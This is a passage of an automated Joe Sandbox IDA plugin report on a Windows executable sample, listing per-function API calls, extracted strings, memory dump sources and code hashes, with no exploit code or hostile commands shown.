                                                            • _free.LIBCMT ref: 00BFCC23
                                                            • _free.LIBCMT ref: 00BFCC2A
                                                            • _free.LIBCMT ref: 00BFCC47
                                                            • _free.LIBCMT ref: 00BFCC5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 63efad5d4bb9c2dae470d71057c1993ac791ae8330a09f506e2fdf7887c25980
                                                            • Instruction ID: 5b418336b9b4a6d43527638313e70a1ae7ac25981e13e3694e18331836d6073b
                                                            • Opcode Fuzzy Hash: 63efad5d4bb9c2dae470d71057c1993ac791ae8330a09f506e2fdf7887c25980
                                                            • Instruction Fuzzy Hash: 33315E3560030D9FEB24AA38DA46B7ABBE9EF11350F1454ADE658D7192DF31EC88CB50
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00BE9736
                                                            • _wcslen.LIBCMT ref: 00BE97D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00BE97E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BE9806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BE982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            • Opcode ID: 547b697c21818df1abbe1fed7a0446b88539adafc2cea6688bd4246746509b7f
                                                            • Instruction ID: b1f9ddbff0e5a2d08847bde065ada8ee50cb3c4c04155eb3c75ace27fcdd2c43
                                                            • Opcode Fuzzy Hash: 547b697c21818df1abbe1fed7a0446b88539adafc2cea6688bd4246746509b7f
                                                            • Instruction Fuzzy Hash: DB3146321083957AE729AB369C46F6F77DCEF52710F10019EFA01971D2EB649A0CC3A6
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 00BED6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00BED6ED
                                                              • Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00BED709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BED720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00BED734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BED75D
                                                            • DeleteObject.GDI32(00000000), ref: 00BED764
                                                            • GetWindow.USER32(00000000,00000002), ref: 00BED76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: b986b13abfc350b0916bee4bdf53e0605a93afec5997791336ba53634278c675
                                                            • Instruction ID: 88f7d3009563fcda674e8b003ca1e5caa8be68578c441e57ebcbf79c7de94337
                                                            • Opcode Fuzzy Hash: b986b13abfc350b0916bee4bdf53e0605a93afec5997791336ba53634278c675
                                                            • Instruction Fuzzy Hash: 511126722043E07BE3216B729C8AFAF76DCEF54711F004161FA51A60D1DBA4CF0546B5
                                                            APIs
                                                            • _free.LIBCMT ref: 00BF9705
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BF9711
                                                            • _free.LIBCMT ref: 00BF971C
                                                            • _free.LIBCMT ref: 00BF9727
                                                            • _free.LIBCMT ref: 00BF9732
                                                            • _free.LIBCMT ref: 00BF973D
                                                            • _free.LIBCMT ref: 00BF9748
                                                            • _free.LIBCMT ref: 00BF9753
                                                            • _free.LIBCMT ref: 00BF975E
                                                            • _free.LIBCMT ref: 00BF976C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: c8f38a6dd3ac2ba90b72366d89156ad2a05769e481ad9c200b815fbde0711b03
                                                            • Instruction ID: 9655b784ee17d40955c1dddf1e9c23ba2163efb145cd3a700fb3b96c6b32ec79
                                                            • Opcode Fuzzy Hash: c8f38a6dd3ac2ba90b72366d89156ad2a05769e481ad9c200b815fbde0711b03
                                                            • Instruction Fuzzy Hash: 0111A47A11010DAFCB01EF94C842DE93BB5EF15390B5154A9FB088F262DE32DE589B84
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: e4f8c0af8084f0c20caf0929e0b9cc8c1cdd26feb870ed7dc14cb37673f82b1d
                                                            • Instruction ID: 33666b62f1a3c80ddb9f9e4159aa310e7a4ec48726a4aec20c7447b43bb3ff97
                                                            • Opcode Fuzzy Hash: e4f8c0af8084f0c20caf0929e0b9cc8c1cdd26feb870ed7dc14cb37673f82b1d
                                                            • Instruction Fuzzy Hash: 57B1347180020DEFCF29EFA4C8819BEBBF5EF14710B1441AAEA156B212D735DB59CB91
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD6FAA
                                                            • _wcslen.LIBCMT ref: 00BD7013
                                                            • _wcslen.LIBCMT ref: 00BD7084
                                                              • Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
                                                              • Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
                                                              • Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: e1a6f2fbe51caff8a6430f808a1397b30674a5ef5e26ce9228046ba8c86aeb39
                                                            • Instruction ID: e49c48cd6898e16c0646dbf3bf1e8d7a70614ed6fe47c852dfb22b1bb772b6ad
                                                            • Opcode Fuzzy Hash: e1a6f2fbe51caff8a6430f808a1397b30674a5ef5e26ce9228046ba8c86aeb39
                                                            • Instruction Fuzzy Hash: 2F41B7B1D4838479EB20A7749C82FEEF7EC9F14314F0445D7FA55A62C2FA749A488621
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • EndDialog.USER32(?,00000001), ref: 00BEB610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00BEB637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BEB650
                                                            • SetWindowTextW.USER32(?,?), ref: 00BEB661
                                                            • GetDlgItem.USER32(?,00000065), ref: 00BEB66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BEB67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BEB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: 74dc12b1500cb121c3cf72fb6de72811d51e62e4732224dfd4f00042da02947f
                                                            • Instruction ID: 596f36c7d711dfd8ada6be620317df03fd581d12033758189db0e8f656f6637d
                                                            • Opcode Fuzzy Hash: 74dc12b1500cb121c3cf72fb6de72811d51e62e4732224dfd4f00042da02947f
                                                            • Instruction Fuzzy Hash: C221F732614288BFD6219F77ED89F3F7BBCEB4AB41F010058F605A65E0CB629902D631
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,7A853BE7,00000001,00000000,00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00BEFE1F
                                                            • _com_issue_error.COMSUPP ref: 00BEFE48
                                                            • _com_issue_error.COMSUPP ref: 00BEFE52
                                                            • GetLastError.KERNEL32(80070057,7A853BE7,00000001,00000000,00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE57
                                                            • _com_issue_error.COMSUPP ref: 00BEFE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE80
                                                            • _com_issue_error.COMSUPP ref: 00BEFE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: 10923e2525d559266e164e398ac6687538e915600f47f917ef5accd81feecf62
                                                            • Instruction ID: 890012a1120f0ddcd5239f6c3562c1eb07f3b1003d8cd4e6e348c8b5a35ba6b6
                                                            • Opcode Fuzzy Hash: 10923e2525d559266e164e398ac6687538e915600f47f917ef5accd81feecf62
                                                            • Instruction Fuzzy Hash: 9C41EB71A0029AABCB109F65CC45BBEBBE8EF48710F2042B9F915D7391D735A900C7A5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: a29c45ed0f9396b75ab9600265084fc6559f9c6864028257335e7884d0384b27
                                                            • Instruction ID: 93308de2b72f7f8526419c673530fb63bb5db2a4e364b6efd93a53765553437a
                                                            • Opcode Fuzzy Hash: a29c45ed0f9396b75ab9600265084fc6559f9c6864028257335e7884d0384b27
                                                            • Instruction Fuzzy Hash: 1D715E71A00659EFDF14DF64CC99EAEB7B9FF48710B15419AE512A73A0DB30AE01CB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BD93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00BD93C9
                                                              • Part of subcall function 00BDC29A: _wcslen.LIBCMT ref: 00BDC2A2
                                                              • Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1
                                                            • _swprintf.LIBCMT ref: 00BD9465
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 00BD94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 00BD9514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 1b3e246f923158d25ff167b47db70714db4db089c277e3e47b6783267cbda174
                                                            • Instruction ID: 18e9f13b8484785137ab425846ec0ff8d5d3cf9ba9f0a1a27eecc2a1e0ef2ada
                                                            • Opcode Fuzzy Hash: 1b3e246f923158d25ff167b47db70714db4db089c277e3e47b6783267cbda174
                                                            • Instruction Fuzzy Hash: B741637190025966DF21ABA1DC45EDEF3BCEF55344F0048E6B649E3251FB388B89CB60
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 00BE122E
                                                              • Part of subcall function 00BDB146: GetVersionExW.KERNEL32(?), ref: 00BDB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00BE1251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00BE1263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BE1274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00BE12CF
                                                            • __aullrem.LIBCMT ref: 00BE1379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 942a122988d25df7eaae5392b548c884f4cba231ef1350e3a58f7d7881ea0a9a
                                                            • Instruction ID: 79aaea082d9593b903ec08bc180c7bc25c35bf0d42e11183efa68afd38e4b4d7
                                                            • Opcode Fuzzy Hash: 942a122988d25df7eaae5392b548c884f4cba231ef1350e3a58f7d7881ea0a9a
                                                            • Instruction Fuzzy Hash: 4241F7B1508345AFC710DF69C884A6FBBE9FB88314F108D2EF596C2610E778E549DB52
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00BD2536
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                              • Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: e666734c8c3563c138d0e363306a5df4250191ebbac68c2b783684df215dddf9
                                                            • Instruction ID: 3eb677966329f72204934822e3e8e8bad40d0fe43b0df5a2e3118f76f14ab066
                                                            • Opcode Fuzzy Hash: e666734c8c3563c138d0e363306a5df4250191ebbac68c2b783684df215dddf9
                                                            • Instruction Fuzzy Hash: CDF1E9706083C15BDB15DB248495BFAFBD59FA0300F0805EBEE869B383EB659945C7A2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: d1b9223b6a95bf79e9a9f2cc64cf633e76edb6c054c536a7578361d487bbb8e4
                                                            • Instruction ID: ee7740a0343dadec621b6073a5fe63db29e875f1f0dbb9012d41c9e876baf08a
                                                            • Opcode Fuzzy Hash: d1b9223b6a95bf79e9a9f2cc64cf633e76edb6c054c536a7578361d487bbb8e4
                                                            • Instruction Fuzzy Hash: 085127667403F295DB349A2B9C1177673E0DFA1750F6845BAFAC1CB1C0FBA58C8D82A1
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BFFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00BFF6CF
                                                            • __fassign.LIBCMT ref: 00BFF74A
                                                            • __fassign.LIBCMT ref: 00BFF765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BFF78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,00BFFE02,00000000,?,?,?,?,?,?,?,?,?,00BFFE02,00000000), ref: 00BFF7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,00BFFE02,00000000,?,?,?,?,?,?,?,?,?,00BFFE02,00000000), ref: 00BFF7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 530eb01bb2419a3b04616527053dd6c34dc02e1cd5d84e3dd7b8811f368fc72f
                                                            • Instruction ID: 30823a768307041ba4cb6da2c83187c00201ed184461909745165b4e26028482
                                                            • Opcode Fuzzy Hash: 530eb01bb2419a3b04616527053dd6c34dc02e1cd5d84e3dd7b8811f368fc72f
                                                            • Instruction Fuzzy Hash: DE5165B19002499FDB10CFA8DC85BFEFBF8EF09710F14416AE655E7251E670A945CBA0
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BF2937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00BF293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BF29C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00BF29F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BF2A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
